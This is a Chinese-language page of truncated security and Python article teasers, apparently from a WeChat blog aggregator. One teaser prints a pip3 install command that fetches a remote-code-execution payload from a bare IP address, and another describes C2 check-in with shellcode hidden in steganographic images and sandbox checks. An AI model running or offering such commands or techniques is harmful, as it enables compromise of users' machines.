免责声明本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。前言之前的白嫖B站图床用不了了,具体我就不截图了,直接上新方法。本地配置安装依赖 pip inst...
黑客内网代理和穿透工具的分析记录
0x00 前言记录一下对内网代理和穿透工具的分析过程,着重在流量侧。0x01 环境攻击机器:192.168.1.131和192.168.1.133目标机器:192.168.1.137目标机器为双网卡,...
burpsuite验证码识别插件(文末下载)
项目地址 https://github.com/smxiazi/NEW_xp_CAPTCHA 介绍 xp_CAPTCHA (白嫖版) 验证码识别 burp插件 支持验证码返回包为json格式 注意: ...
一个简单的步骤让你的 Python 代码更干净
点击上方“萝卜大杂烩”,选择“星标”公众号超级无敌干货,第一时间送达!!!说起来容易做起来难,我们都知道代码可读性非常重要,但是写的时候总是随心所欲,不考虑类型提示、import 排序、PEP8 规范...
干货 | 通过人工准入实现C2上线
把shellcode载荷放在平台生成的隐写图片中,前锋马回传机器基础信息用于判断是否是沙箱或调试机,确认是真实目标,人为准入,目标机解析隐写图片shellcode后上线到c2。server端是djan...
10 个 Python 脚本来自动化你的日常任务
英文:https://python.plainenglish.io/10-python-scripts-to-automate-your-daily-task-de1496fdf64a ...
一款功能强大的子域收集工具
功能强大的子域收集工具:OneForAll简介OneForAll 收集能力强大、支持子域爆破、支持子域验证、支持子域爬取、支持子域置换、支持子域接管、处理功能强大、速度极快、体验良好,是一款集百家之长...
警惕诡异的pip install命令(linux系统)
昨天出了一个新的“洞”,pip远程命令执行,我们回顾一下,顺便谨防钓鱼攻击其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。首先脚本地址是在github的https://github.c...
Linux Pip RCE (环境仅限半小时)
pip3 install "http://82"."156"."127"."149/Rce.png"原文始发于微信公众号(利刃信安):Linux Pip RCE (环境仅限半小时)
由安装DS_Store文件泄露处理工具引发的一系列问题
安装ds_store_exp-master工具,下载解压之后需要先安装依赖包 cmd执行:「pip2 install ds-store requests」 发现报错:1搜索该报错发现是因为pip工具早...
python爬虫由浅入深(进阶篇)
前言 经过我们基础篇的学习,大家都对爬虫的基本理念有了深刻的了解,进阶篇主要是讲解重要的爬虫框架scrapy和selenium模块 scrapy框架介绍: 框架就是一个集成了很多功能并且具有很强通用性...
【CTF靶场】从0-1快速搭建比赛训练靶场
欢迎回来,CTF靶场搭建第一期可供比赛,训练使用首先我们需要安装镜像,这里我选择的是阿里云的ECS,Ubuntu16.04安装前准备1.更新apt包索引 sudo apt-get&...
8